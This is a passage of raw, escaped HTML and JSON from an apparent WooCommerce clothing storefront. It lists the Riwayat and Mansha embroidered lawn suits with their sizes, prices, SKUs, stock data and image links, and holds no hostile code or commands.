https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/MINT-GREEN-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/riwayat-chapter-2\/\" rel=\"tag\">RIWAYAT CHAPTER 2<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-5\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-5\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"694\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":30.99,"display_regular_price":30.99,"image":{"title":"MINTGREN","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/MINTGREN.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/MINTGREN-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/MINTGREN-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/MINTGREN-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/MINTGREN.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/MINTGREN-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/MINTGREN-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":665,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"RIW-CH2-05","variation_description":"","variation_id":695,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/MINTGREN-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/MINTGREN-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/MINTGREN.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n<\/ul>\n<\/div><\/div>\t<\/div>\r\n<\/div>\r\n\r\n<div class=\"porto-hotspot pos-right\" style=\"left:73.5%;top:34%;\">\r\n\t<i class=\"porto-hotspot-icon fas fa-circle\"><\/i>\r\n\t<div class=\"popup-wrap\">\r\n\t<div class=\"porto-products wpb_content_element\"><div class=\"woocommerce \"><ul class=\"products products-container grid pcols-lg-1 pcols-md-1 pcols-xs-1 pcols-ls-1 pwidth-lg-1 pwidth-md-1 pwidth-xs-1 pwidth-ls-1 is-shortcode\"\n\t data-cur_page=\"1\" data-max_page=\"1\" data-product_layout=\"product-outimage\">\n\n<li class=\"product-col product-outimage product type-product post-562 status-publish first instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1a-1-700x1050-34.99-600x900_2_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1b-1-700x1050-1-600x900_1_11zon.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1b-1-700x1050-1-600x900_1_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1b-1-700x1050-1-600x900_1_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"562\" data-product_variations=\"[{"attributes":{"attribute_pa_size":"large"},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"1a-1-700x1050-34.99-600x900_2_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":951,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":10,"min_qty":1,"price_html":"","sku":"MAN-CH1-01","variation_description":"","variation_id":564,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg"},{"attributes":{"attribute_pa_size":"medium"},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"1a-1-700x1050-34.99-600x900_2_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":951,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-01","variation_description":"","variation_id":565,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg"},{"attributes":{"attribute_pa_size":"small"},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"1a-1-700x1050-34.99-600x900_2_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":951,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-01","variation_description":"","variation_id":566,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n<\/ul>\n<\/div><\/div>\t<\/div>\r\n<\/div>\r\n[\/vc_column][vc_column width=”1\/3″ offset=”vc_col-md-2″][vc_btn title=”SHOP MANSHA” style=”modern” size=”lg” align=”center” skin=”dark” btn_fs=”1rem” btn_fw=”700″ btn_ls=”-.025em” animation_delay=”600″ button_block=”true” btn_px=”1em” btn_py=”1em” el_class=”mb-3″ animation_type=”fadeInRight” link=”url:https%3A%2F%2Fpulkash.com%2Fproduct-category%2Fwomen%2Fstitched%2Fmansha%2F”][vc_btn title=”SHOP RIWAYAT” style=”modern” size=”lg” align=”center” skin=”dark” btn_fs=”1rem” btn_fw=”700″ btn_ls=”-.025em” animation_delay=”600″ button_block=”true” btn_px=”1em” btn_py=”1em” el_class=”mb-5 mb-md-0″ animation_type=”fadeInRight” link=”url:https%3A%2F%2Fpulkash.com%2Fproduct-category%2Fwomen%2Fstitched%2Friwayat-chapter-2%2F”][\/vc_column][\/vc_row][vc_row wrap_container=”yes” el_class=”py-5″][vc_column][vc_custom_heading text=”Stitched Products” font_container=”tag:h2|font_size:2rem|text_align:center|line_height:1.2″ use_theme_fonts=”yes” font_weight=”600″ letter_spacing=”-.01em” el_class=”mt-3 mb-4″ animation_type=”maskUp”]<div id=\"porto-products-3467\" class=\"porto-products wpb_content_element mb-5 swiper-wrapper\"><div class=\"slider-wrapper\"><div class=\"woocommerce columns-4 \"><ul class=\"products products-container products-slider owl-carousel show-nav-middle pcols-lg-4 pcols-md-3 pcols-xs-3 pcols-ls-2 pwidth-lg-4 pwidth-md-3 pwidth-xs-2 pwidth-ls-1 is-shortcode\"\n\t\tdata-plugin-options=\"{"themeConfig":true,"lg":4,"md":3,"xs":3,"ls":2,"nav":true}\" data-cur_page=\"1\" data-max_page=\"1\" data-product_layout=\"product-outimage_aq_onimage\">\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-562 status-publish first instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1a-1-700x1050-34.99-600x900_2_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1b-1-700x1050-1-600x900_1_11zon.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1b-1-700x1050-1-600x900_1_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1b-1-700x1050-1-600x900_1_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"562\" data-product_sku=\"MAN-CH1-01\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"562\" data-product_variations=\"[{"attributes":{"attribute_pa_size":"large"},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"1a-1-700x1050-34.99-600x900_2_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":951,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":10,"min_qty":1,"price_html":"","sku":"MAN-CH1-01","variation_description":"","variation_id":564,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg"},{"attributes":{"attribute_pa_size":"medium"},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"1a-1-700x1050-34.99-600x900_2_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":951,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-01","variation_description":"","variation_id":565,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg"},{"attributes":{"attribute_pa_size":"small"},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"1a-1-700x1050-34.99-600x900_2_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":951,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-01","variation_description":"","variation_id":566,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-601 status-publish instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-2\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/black-ora-600x900_3_11zon.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/black-ora-600x900_3_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/black-ora-600x900_3_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/black-orr-600x900_5_11zon.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/black-orr-600x900_5_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/black-orr-600x900_5_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-2\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"601\" data-product_sku=\"MAN-CH1-02\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a 